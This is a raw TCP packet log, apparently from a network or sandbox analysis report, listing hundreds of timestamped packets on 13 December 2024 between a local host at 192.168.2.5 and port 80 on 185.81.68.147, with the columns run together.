                                                                                                                                                                Dec 13, 2024 01:37:09.739279032 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.739989042 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.740102053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.740231037 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.740873098 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.741024017 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.741247892 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.741805077 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.741913080 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.742022991 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.742681980 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.742808104 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.743016958 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.743623018 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.743753910 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.743880987 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.744507074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.744621038 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.744730949 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.745445967 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.745541096 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.745675087 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.746326923 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.746483088 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.747232914 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.747345924 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.747349977 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.747467041 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.748152971 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.748271942 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.748780012 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.749068975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.749265909 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.749701977 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.749959946 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.750082016 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.750480890 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.750931978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.750997066 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.751141071 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.751790047 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.751899004 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.752068996 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.752695084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.752841949 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.753597975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.753717899 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.753796101 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.753848076 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.754513979 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.754636049 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.754770994 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.755433083 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.755494118 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.755656958 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.756354094 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.756421089 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.756534100 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.757296085 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.757368088 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.757478952 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.758160114 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.758276939 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.759053946 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.759150028 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.759174109 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.759995937 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.760108948 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.760109901 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.760171890 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.760900974 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.761039972 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.761137009 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.761782885 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.761908054 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.762025118 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.762711048 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.762842894 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.762957096 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.763650894 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.763755083 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.763905048 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.764519930 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.764631987 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.764744997 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.765446901 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.765559912 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.765678883 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.766386032 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.766494036 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.766649008 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.767257929 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.767374039 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.767484903 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.768177986 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.768349886 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.768775940 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.769073009 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.769212008 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.769963980 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.769994974 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.770128012 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.770535946 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.770934105 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.771018028 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.771116018 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.771986008 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.772027016 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.772175074 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.772694111 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.817163944 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.917056084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.917117119 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.917282104 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.917382956 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.917481899 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.917531013 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.918327093 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.918436050 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.918545008 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.919214964 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.919346094 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.919461012 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.920187950 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.920216084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.920342922 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.921045065 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.921180010 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.921291113 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.921958923 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.921977043 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.922108889 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.922841072 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.922956944 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.923063040 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.923782110 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.923964977 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.924058914 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.924669027 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.924806118 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.924913883 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.925607920 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.925729990 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.925829887 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.926489115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.926587105 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.926683903 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.927429914 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.927494049 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.927602053 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.928333998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.928431034 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.928536892 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.929208994 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.929311037 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.929424047 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.930110931 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.930234909 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.930337906 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.931080103 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.931221962 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.931334019 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.931925058 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.932039022 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.932145119 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.932831049 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.932971001 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.933078051 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.933767080 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.933969975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.934079885 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.934667110 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.934771061 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.934894085 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.935564041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.935672045 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.935784101 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.936486006 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.936558962 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.936665058 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.937396049 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.937505007 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.937611103 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.938302994 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.938411951 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.938520908 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.939208984 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.939449072 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.939569950 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.940114975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.940263033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.940373898 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.941018105 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.941138983 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.941245079 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.941955090 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.942055941 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.942190886 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.942866087 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.942954063 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.943058014 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.943749905 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.943893909 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.943994045 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.944674969 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.944776058 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.944875956 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.945609093 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.945704937 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.945813894 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.946477890 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.946597099 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.946710110 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.947438955 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.947511911 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.947626114 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.948299885 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.948324919 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.948450089 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.949218035 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.949356079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.949467897 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.950138092 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.950285912 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.950397015 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.951107979 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.951195955 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.951302052 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.951972961 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.952049971 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.952157974 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.952882051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.953078032 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.953186989 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.953771114 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.953933001 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.954046011 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.954679966 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.954777002 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.954885960 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.955578089 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.955715895 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.955826044 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.956509113 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.956610918 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.956722975 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.957412958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.957465887 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.957578897 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.958316088 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.958492041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.958600044 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.959335089 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.959409952 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.959518909 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.960169077 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.960351944 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.960458040 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.961046934 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.961149931 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.961253881 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.961939096 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.962054014 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.962161064 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.962842941 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.963021994 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.963124037 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.963766098 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.963876963 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.963978052 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.964632034 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.004692078 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.108810902 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.108892918 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.109021902 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.109071016 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.109194040 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.109241009 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.109949112 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.110080957 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.110127926 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.110857010 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.111598015 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.111646891 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.112060070 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.112076998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.112133980 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.112673998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.112771988 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.112823963 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.113585949 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.113703966 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.113758087 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.114491940 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.114629030 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.114681005 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.115415096 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.115576982 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.115626097 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.116319895 CET8049707185.81.68.147192.168.2.5
